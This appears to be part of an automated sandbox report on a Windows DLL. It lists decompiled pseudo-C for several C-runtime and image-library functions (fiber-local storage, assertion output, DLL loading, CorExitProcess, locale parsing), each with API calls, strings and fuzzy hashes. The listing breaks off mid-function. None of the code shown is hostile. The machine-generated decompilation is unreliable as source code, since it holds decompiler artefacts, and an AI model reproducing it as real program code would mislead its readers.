std::error_category::operator==.LIBCPMTD ref: 6EDCBD7C
__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6EDCBD9C
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 6EDCBDA8

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$Affinity::operator!=FrameHandlerHandler3::HardwareMap::iterator::operator++std::error_category::operator==$Base::ContextIdentityQueueWork
String ID:
API String ID: 1043390661-0
Opcode ID: c6ad3f7cfa89417c93a59d2160ba7eb85de3f1ab4f6a739b3c60e71360977317
Instruction ID: 0088fcbe821567fd3b536fc38228b990f0cc6498fc115ae3e25fdde0f69c00bc
Opcode Fuzzy Hash: c6ad3f7cfa89417c93a59d2160ba7eb85de3f1ab4f6a739b3c60e71360977317
Instruction Fuzzy Hash: 70313475C00109AFCB08DFD4D9908EEB7BDAE58644B104969D5426B190EF30EB09CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6EE394B1, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EE394B1(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6ee77a90 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6EE3A6AB(_t13, __eflags,  *0x6ee77a90);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6EE3A6E6(_t14, __eflags,  *0x6ee77a90, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6EE40C36();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6EE3A6E6(_t18, __eflags,  *0x6ee77a90, 0);
								} else {
									_t8 = E6EE3A6E6(_t18, __eflags,  *0x6ee77a90, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6EE3ACC7(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

GetLastError.KERNEL32(00000001,?,6EE393C2,6EE36D26,6EE36886,?,6EE36ABE,?,00000001,?,?,00000001,?,6EE686F0,0000000C,6EE36BB7), ref: 6EE394BF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EE394CD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EE394E6
SetLastError.KERNEL32(00000000,6EE36ABE,?,00000001,?,?,00000001,?,6EE686F0,0000000C,6EE36BB7,?,00000001,?), ref: 6EE39538

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 16d99d7571d0e4a44a09ad129b1adc9aaffe76e85de4395350d80f60c7b78e6f
Instruction ID: 005bc02640ea62a65588d66090cb50f1f055e30f26e154ef2bb341e281137706
Opcode Fuzzy Hash: 16d99d7571d0e4a44a09ad129b1adc9aaffe76e85de4395350d80f60c7b78e6f
Instruction Fuzzy Hash: E4019E3212CA336EAF5415F8BCC499B3699DB422BEB30033DF569806D8EF524891C550

Uniqueness

Uniqueness Score: -1.00%

Function 6EE20D60, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6EE20D60(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t102;
				intOrPtr _t103;
				intOrPtr _t106;
				intOrPtr _t111;
				intOrPtr _t115;
				intOrPtr _t157;
				intOrPtr _t162;
				signed int _t170;
				void* _t176;
				void* _t177;

				_t186 = __fp0;
				_t175 = __esi;
				_t174 = __edi;
				_t149 = __edx;
				_t126 = __ebx;
				_t180 = _a4;
				if(_a4 == 0) {
					_push(0xab);
					E6EE3EEBE(__ebx, __edx, __edi, __esi, _t180, __fp0, L"p_image_src != 00", L"image.c");
					_t176 = _t176 + 0xc;
				}
				_t181 = _a8;
				if(_a8 == 0) {
					_push(0xac);
					E6EE3EEBE(_t126, _t149, _t174, _t175, _t181, _t186, L"p_image_dest != 00", L"image.c");
					_t176 = _t176 + 0xc;
				}
				 *_a8 =  *_a4;
				 *((intOrPtr*)(_a8 + 4)) =  *((intOrPtr*)(_a4 + 4));
				 *((intOrPtr*)(_a8 + 8)) =  *((intOrPtr*)(_a4 + 8));
				 *((intOrPtr*)(_a8 + 0xc)) =  *((intOrPtr*)(_a4 + 0xc));
				if( *(_a8 + 0x18) == 0) {
					L12:
					 *(_a8 + 0x10) =  *(_a4 + 0x10);
					_t102 = E6EE20470( *(_a8 + 0x10) * 0x34);
					_t177 = _t176 + 4;
					 *(_a8 + 0x18) = _t102;
					_t157 = _a8;
					__eflags =  *((intOrPtr*)(_t157 + 0x18));
					if( *((intOrPtr*)(_t157 + 0x18)) != 0) {
						_v8 = 0;
						while(1) {
							_t103 = _a8;
							__eflags = _v8 -  *((intOrPtr*)(_t103 + 0x10));
							if(_v8 >=  *((intOrPtr*)(_t103 + 0x10))) {
								break;
							}
							E6EE37600(_v8 * 0x34 +  *(_a8 + 0x18), _v8 * 0x34 +  *((intOrPtr*)(_a4 + 0x18)), 0x34);
							_t177 = _t177 + 0xc;
							 *( *(_a8 + 0x18) + 0x2c + _v8 * 0x34) = 0;
							_t170 = _v8 + 1;
							__eflags = _t170;
							_v8 = _t170;
						}
						 *((intOrPtr*)(_a8 + 0x14)) =  *((intOrPtr*)(_a4 + 0x14));
						 *(_a8 + 0x20) =  *(_a4 + 0x20);
						_t106 = _a8;
						__eflags =  *((intOrPtr*)(_t106 + 0x20));
						if( *((intOrPtr*)(_t106 + 0x20)) == 0) {
							 *(_a8 + 0x1c) = 0;
							return _t106;
						}
						 *(_a8 + 0x1c) = E6EE20470( *(_a8 + 0x20));
						_t162 = _a8;
						__eflags =  *((intOrPtr*)(_t162 + 0x1c));
						if( *((intOrPtr*)(_t162 + 0x1c)) != 0) {
							return E6EE37600( *(_a8 + 0x1c),  *((intOrPtr*)(_a4 + 0x1c)),  *(_a4 + 0x20));
						}
						_t111 = _a8;
						 *(_t111 + 0x1c) = 0;
						 *(_a8 + 0x20) = 0;
						return _t111;
					}
					_t115 = _a8;
					 *(_t115 + 0x18) = 0;
					 *(_a8 + 0x10) = 0;
					return _t115;
				} else {
					_v8 = 0;
					while(_v8 <  *(_a8 + 0x10)) {
						_v12 = _v8 * 0x34 +  *(_a8 + 0x18);
						if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
							 *0x6ee67168( *((intOrPtr*)(_v12 + 0x2c)));
						}
						_v8 = _v8 + 1;
					}
					E6EE20590( *(_a8 + 0x18));
					_t176 = _t176 + 4;
					 *(_a8 + 0x18) = 0;
					goto L12;
				}
			}

APIs

_opj_image_data_free@4.BCCW1XUJAH(?), ref: 6EE20E11

Strings

p_image_dest != 00, xrefs: 6EE20D93
image.c, xrefs: 6EE20D71
image.c, xrefs: 6EE20D8E
p_image_src != 00, xrefs: 6EE20D76

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _opj_image_data_free@4
String ID: image.c$image.c$p_image_dest != 00$p_image_src != 00
API String ID: 2595206506-3786744418
Opcode ID: e915161183584ba38635ee1d90a329e56d50ba68067cb0f368001227931986cc
Instruction ID: 0395d08276b3abdcad476853f9b26a92d0e5438bd5ac1ff8745b597535567fe9
Opcode Fuzzy Hash: e915161183584ba38635ee1d90a329e56d50ba68067cb0f368001227931986cc
Instruction Fuzzy Hash: EC6183B4A05209EFDB48CF84D590A99B7B5FB48318F20C199EC594F396D771EA82CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6EE3EDB5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E6EE3EDB5(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void _v1160;
				long _v1164;
				signed int _t12;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr* _t30;
				void* _t33;
				intOrPtr _t35;
				void* _t39;
				signed int _t44;

				_t42 = _t44;
				_t12 =  *0x6ee77a68; // 0xa89efc87
				_v8 = _t12 ^ _t44;
				_t26 = _a8;
				_t35 = _a4;
				_t39 = GetStdHandle(0xfffffff4);
				if(_t39 == 0xffffffff || _t39 == 0 || GetFileType(_t39) != 2 || swprintf( &_v1160, 0x240, L"Assertion failed: %Ts, file %Ts, line %d\n", _t35, _t26, _a12) < 0) {
					L8:
					return E6EE361A7(_v8 ^ _t42);
				} else {
					_t30 =  &_v1160;
					_t33 = _t30 + 2;
					do {
						_t19 =  *_t30;
						_t30 = _t30 + 2;
					} while (_t19 != 0);
					_v1164 = 0;
					_t32 = _t30 - _t33 >> 1;
					if(WriteConsoleW(_t39,  &_v1160, _t30 - _t33 >> 1,  &_v1164, 0) != 0) {
						E6EE3E6F4(_t26, _t32, _t33, 0, _t39, __fp0);
						asm("int3");
						return L"Assertion failed: %Ts, file %Ts, line %d\n";
					} else {
						goto L8;
					}
				}
			}

APIs

GetStdHandle.KERNEL32(000000F4,?,00000030), ref: 6EE3EDD5
GetFileType.KERNEL32(00000000,?,00000030), ref: 6EE3EDE7
swprintf.LIBCMT ref: 6EE3EE08
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00000030), ref: 6EE3EE45

Strings

Assertion failed: %Ts, file %Ts, line %d, xrefs: 6EE3EDFD

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: Assertion failed: %Ts, file %Ts, line %d
API String ID: 2943507729-1719349581
Opcode ID: c671c9f5f8cbbef94415cd1845bf8b4894ef7abf21c1504576988f208917e5ed
Instruction ID: 9f913d0cc2faa4501d0afbd1f86170735e26e643085867e40b163dfdadde4cdc
Opcode Fuzzy Hash: c671c9f5f8cbbef94415cd1845bf8b4894ef7abf21c1504576988f208917e5ed
Instruction Fuzzy Hash: 7A1138755007296BCB109BA5CC449EF77BCEF85614F70455DEA19A3294EB309E41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6EE3A552, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE3A552(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6ee78fb4 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6ee5d1a8 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6EE44055(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

APIs

FreeLibrary.KERNEL32(00000000,?,?,6EE3A613,00000000,?,00000001,00000000,?,6EE3A68A,00000001,FlsFree,6EE5D264,FlsFree,00000000), ref: 6EE3A5E2

Strings

api-ms-, xrefs: 6EE3A5A2

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: ed731cf546721a449ef36ac8d2abeedb5a48fc81165e52da52243f0bd16b45a0
Instruction ID: f8ea7ba8ab02a56b7f02ff50464ab835a276efbea122819b10a42e4f8bdad6f9
Opcode Fuzzy Hash: ed731cf546721a449ef36ac8d2abeedb5a48fc81165e52da52243f0bd16b45a0
Instruction Fuzzy Hash: 56119135A95E35BBDF528AE88840B4A37A49F02764F310750F918EB3C8D761E940C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 6EE3AA16, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6EE3AA16(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6ee5714c(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6ee3aa1c
0x6ee3aa20
0x6ee3aa2b
0x6ee3aa33
0x6ee3aa3e
0x6ee3aa44
0x6ee3aa48
0x6ee3aa4f
0x6ee3aa55
0x6ee3aa55
0x6ee3aa57
0x6ee3aa5c
0x00000000
0x6ee3aa61
0x6ee3aa68

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6EE3A9C8,6EDCB255,?,6EE3A990,6EDCB255,?,6EDCB255), ref: 6EE3AA2B
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EE3AA3E
FreeLibrary.KERNEL32(00000000,?,?,6EE3A9C8,6EDCB255,?,6EE3A990,6EDCB255,?,6EDCB255), ref: 6EE3AA61

Strings

mscoree.dll, xrefs: 6EE3AA24
CorExitProcess, xrefs: 6EE3AA36

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 23ab904a53b8b9891b1070f4c92997ac8b6a3e3322b3e37f7bcdf47f59da9444
Instruction ID: b35c9bc0fb2c8038d2ec1937e2654de3e116f98320d518d913859f61aedb3d9f
Opcode Fuzzy Hash: 23ab904a53b8b9891b1070f4c92997ac8b6a3e3322b3e37f7bcdf47f59da9444
Instruction Fuzzy Hash: 4EF08C35950629FBDF01AB90CE09B9E7BB9EB01366F214060F544A2390CB328E50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6EE47040, Relevance: 7.7, APIs: 5, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6EE47040(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				void* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t284;
				signed int _t291;
				signed int _t294;
				signed int _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t339;
				void* _t341;
				signed int _t343;
				void* _t344;
				intOrPtr _t345;
				signed int _t350;
				signed int _t351;
				intOrPtr* _t356;
				signed int _t370;
				signed int _t372;
				signed int _t374;
				intOrPtr* _t375;
				signed int _t377;
				void* _t382;
				intOrPtr* _t387;
				intOrPtr* _t390;
				void* _t393;
				signed int _t394;
				intOrPtr* _t397;
				intOrPtr* _t398;
				char* _t405;
				intOrPtr _t409;
				intOrPtr* _t410;
				signed int _t412;
				signed int _t417;
				signed int _t418;
				intOrPtr* _t422;
				intOrPtr* _t423;
				signed int _t432;
				short _t433;
				void* _t434;
				void* _t436;
				signed int _t437;
				signed int _t439;
				intOrPtr _t440;
				signed int _t443;
				intOrPtr _t444;
				signed int _t446;
				signed int _t449;
				intOrPtr _t455;
				signed int _t456;
				signed int _t458;
				signed int _t459;
				signed int _t463;
				signed int _t465;
				signed int _t468;
				signed int* _t469;
				short _t470;
				signed int _t472;
				signed int _t473;
				void* _t475;
				void* _t476;
				signed int _t477;
				void* _t478;
				void* _t479;
				signed int _t480;
				void* _t482;
				void* _t483;
				signed int _t495;

				_t499 = __fp0;
				_t431 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t370 = E6EE44756(0x6a6);
				_t250 = 0;
				_pop(_t382);
				if(_t370 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t370 = 1;
					_t2 = _t370 + 4; // 0x4
					_t439 = _t2;
					_t455 = _a4;
					 *_t439 = 0;
					_t251 = _t455 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0x6ee5f920);
					_push( *0x6ee5f85c);
					E6EE46F7C(_t370, _t382, __edx, _t439, _t455, __fp0, _t439, 0x351, 3);
					_t476 = _t475 + 0x18;
					_v8 = 0x6ee5f85c;
					while(1) {
						L2:
						_t254 = E6EE4855C(_t439, 0x351, 0x6ee5f91c);
						_t477 = _t476 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t422 = _t8;
							_t350 =  *_v16;
							_v16 = _t422;
							_t423 =  *_t422;
							_v20 = _t423;
							goto L4;
						}
						while(1) {
							L4:
							_t431 =  *_t350;
							if(_t431 !=  *_t423) {
								break;
							}
							if(_t431 == 0) {
								L8:
								_t351 = 0;
							} else {
								_t431 =  *((intOrPtr*)(_t350 + 2));
								if(_t431 !=  *((intOrPtr*)(_t423 + 2))) {
									break;
								} else {
									_t350 = _t350 + 4;
									_t423 = _t423 + 4;
									if(_t431 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x6ee5f920);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t351);
							_t356 = _v8 + 0xc;
							_v8 = _t356;
							_push( *_t356);
							E6EE46F7C(_t370, _t423, _t431, _t439, _t455, _t499, _t439, 0x351, 3);
							_t476 = _t477 + 0x18;
							if(_v8 < 0x6ee5f88c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6EE4471C(_t370);
									_t446 = _t439 | 0xffffffff;
									__eflags =  *(_t455 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E6EE4471C( *(_t455 + 0x28));
										}
									}
									__eflags =  *(_t455 + 0x24);
									if( *(_t455 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t446 == 1;
										if(_t446 == 1) {
											E6EE4471C( *(_t455 + 0x24));
										}
									}
									 *(_t455 + 0x24) = 0;
									 *(_t455 + 0x1c) = 0;
									 *(_t455 + 0x28) = 0;
									 *((intOrPtr*)(_t455 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t455 + 0x40));
								} else {
									_t449 = _t439 | 0xffffffff;
									_t495 =  *(_t455 + 0x28);
									if(_t495 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t495 == 0) {
											E6EE4471C( *(_t455 + 0x28));
										}
									}
									if( *(_t455 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t449 == 1) {
											E6EE4471C( *(_t455 + 0x24));
										}
									}
									 *(_t455 + 0x24) =  *(_t455 + 0x24) & 0x00000000;
									_t28 = _t370 + 4; // 0x4
									_t250 = _t28;
									 *(_t455 + 0x1c) =  *(_t455 + 0x1c) & 0x00000000;
									 *(_t455 + 0x28) = _t370;
									 *((intOrPtr*)(_t455 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L136;
						}
						asm("sbb eax, eax");
						_t351 = _t350 | 0x00000001;
						__eflags = _t351;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6EE3AC93();
					asm("int3");
					_t472 = _t477;
					_t478 = _t477 - 0x1d0;
					_t257 =  *0x6ee77a68; // 0xa89efc87
					_v60 = _t257 ^ _t472;
					_t259 = _v44;
					_push(_t370);
					_push(_t455);
					_t456 = _v40;
					_push(_t439);
					_t440 = _v48;
					_v512 = _t440;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t372 = 0;
						_v452 = 0;
						__eflags = _t456;
						if(__eflags == 0) {
							L80:
							E6EE47040(_t372, _t431, _t440, _t456, __eflags, _t499, _t440);
							goto L81;
						} else {
							__eflags =  *_t456 - 0x4c;
							if( *_t456 != 0x4c) {
								L60:
								_t266 = E6EE46BB6(_t372, _t431, _t440, _t456, _t499, _t456,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t479 = _t478 + 0x18;
								__eflags = _t266;
								if(_t266 != 0) {
									__eflags = 0;
									_t432 = _t440 + 0x20;
									_t458 = 0;
									_v452 = _t432;
									do {
										__eflags = _t458;
										if(_t458 == 0) {
											L75:
											_t267 = _v460;
										} else {
											_t387 =  *_t432;
											_t268 =  &_v276;
											while(1) {
												__eflags =  *_t268 -  *_t387;
												_t440 = _v464;
												if( *_t268 !=  *_t387) {
													break;
												}
												__eflags =  *_t268;
												if( *_t268 == 0) {
													L68:
													_t269 = 0;
												} else {
													_t433 =  *((intOrPtr*)(_t268 + 2));
													__eflags = _t433 -  *((intOrPtr*)(_t387 + 2));
													_v454 = _t433;
													_t432 = _v452;
													if(_t433 !=  *((intOrPtr*)(_t387 + 2))) {
														break;
													} else {
														_t268 = _t268 + 4;
														_t387 = _t387 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L68;
														}
													}
												}
												L70:
												__eflags = _t269;
												if(_t269 == 0) {
													_t372 = _t372 + 1;
													__eflags = _t372;
													goto L75;
												} else {
													_t270 =  &_v276;
													_push(_t270);
													_push(_t458);
													_push(_t440);
													L84();
													_t432 = _v452;
													_t479 = _t479 + 0xc;
													__eflags = _t270;
													if(_t270 == 0) {
														_t267 = 0;
														_v460 = 0;
													} else {
														_t372 = _t372 + 1;
														goto L75;
													}
												}
												goto L76;
											}
											asm("sbb eax, eax");
											_t269 = _t268 | 0x00000001;
											__eflags = 0;
											goto L70;
										}
										L76:
										_t458 = _t458 + 1;
										_t432 = _t432 + 0x10;
										_v452 = _t432;
										__eflags = _t458 - 5;
									} while (_t458 <= 5);
									__eflags = _t267;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t372;
										if(__eflags != 0) {
											goto L80;
										} else {
										}
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t456 + 2) - 0x43;
								if( *(_t456 + 2) != 0x43) {
									goto L60;
								} else {
									__eflags =  *((short*)(_t456 + 4)) - 0x5f;
									if( *((short*)(_t456 + 4)) != 0x5f) {
										goto L60;
									} else {
										while(1) {
											_t272 = E6EE51763(_t456, 0x6ee5f914);
											_t374 = _t272;
											_v468 = _t374;
											_pop(_t389);
											__eflags = _t374;
											if(_t374 == 0) {
												break;
											}
											_t274 = _t272 - _t456;
											__eflags = _t274;
											_v460 = _t274 >> 1;
											if(_t274 == 0) {
												break;
											} else {
												_t276 = 0x3b;
												__eflags =  *_t374 - _t276;
												if( *_t374 == _t276) {
													break;
												} else {
													_t443 = _v460;
													_t375 = 0x6ee5f85c;
													_v456 = 1;
													do {
														_t277 = E6EE44055( *_t375, _t456, _t443);
														_t478 = _t478 + 0xc;
														__eflags = _t277;
														if(_t277 != 0) {
															goto L46;
														} else {
															_t390 =  *_t375;
															_t434 = _t390 + 2;
															do {
																_t345 =  *_t390;
																_t390 = _t390 + 2;
																__eflags = _t345 - _v472;
															} while (_t345 != _v472);
															_t389 = _t390 - _t434 >> 1;
															__eflags = _t443 - _t390 - _t434 >> 1;
															if(_t443 != _t390 - _t434 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v456 = _v456 + 1;
														_t375 = _t375 + 0xc;
														__eflags = _t375 - 0x6ee5f88c;
													} while (_t375 <= 0x6ee5f88c);
													_t372 = _v468 + 2;
													_t278 = E6EE5170A(_t389, _t372, 0x6ee5f91c);
													_t440 = _v464;
													_t459 = _t278;
													_pop(_t393);
													__eflags = _t459;
													if(_t459 != 0) {
														L49:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t394 = _v452;
															goto L55;
														} else {
															_push(_t459);
															_t281 = E6EE516FF( &_v276, 0x83, _t372);
															_t480 = _t478 + 0x10;
															__eflags = _t281;
															if(_t281 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6EE3AC93();
																asm("int3");
																_push(_t472);
																_t473 = _t480;
																_t284 =  *0x6ee77a68; // 0xa89efc87
																_v560 = _t284 ^ _t473;
																_push(_t372);
																_t377 = _v544;
																_push(_t459);
																_push(_t440);
																_t444 = _v548;
																_v1288 = _t377;
																_v1284 = E6EE444CA(_t393, _t431, _t499) + 0x278;
																_t291 = E6EE46BB6(_t377, _t431, _t444, _v540, _t499, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t482 = _t480 - 0x2e4 + 0x18;
																__eflags = _t291;
																if(_t291 == 0) {
																	L124:
																	__eflags = 0;
																	goto L125;
																} else {
